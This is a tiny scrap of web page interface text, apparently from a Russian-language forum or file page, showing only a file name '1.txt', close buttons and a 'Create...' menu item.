      1.txt
×
×
  • Создать...